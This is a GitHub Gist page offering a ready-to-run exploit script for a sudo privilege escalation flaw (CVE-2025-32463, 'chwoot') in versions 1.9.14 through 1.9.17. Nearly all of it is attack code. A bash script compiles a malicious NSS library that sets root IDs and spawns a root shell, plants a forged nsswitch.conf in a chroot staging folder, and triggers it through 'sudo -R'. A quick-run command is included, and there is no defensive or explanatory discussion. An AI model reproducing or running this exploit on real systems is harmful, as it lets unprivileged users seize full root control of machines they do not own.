Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save strikoder/439dab5928787b6dbd5bf990da9cf524 to your computer and use it in GitHub Desktop.

Select an option

Save strikoder/439dab5928787b6dbd5bf990da9cf524 to your computer and use it in GitHub Desktop.
Privilege escalation vulnerability in sudo versions 1.9.14 through 1.9.17. Allows local users to gain root privileges

CVE-2025-32463 (chroot/chwoot) - Sudo Privilege Escalation Exploit

Quick Run

chmod +x exploit.sh && ./exploit.sh

Exploit Code (exploit.sh)

#!/bin/bash
STAGE=$(mktemp -d /tmp/sudostage.XXXX)
cd "$STAGE"

cat > xd1337.c << 'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void xd1337(void) {
    setreuid(0, 0);
    setregid(0, 0);
    chdir("/");
    execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p xd/etc libnss_
echo "passwd: /xd1337" > xd/etc/nsswitch.conf
cp /etc/group xd/etc/

gcc -shared -fPIC -Wl,-init,xd1337 -o libnss_/xd1337.so.2 xd1337.c

sudo -R xd /bin/true
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment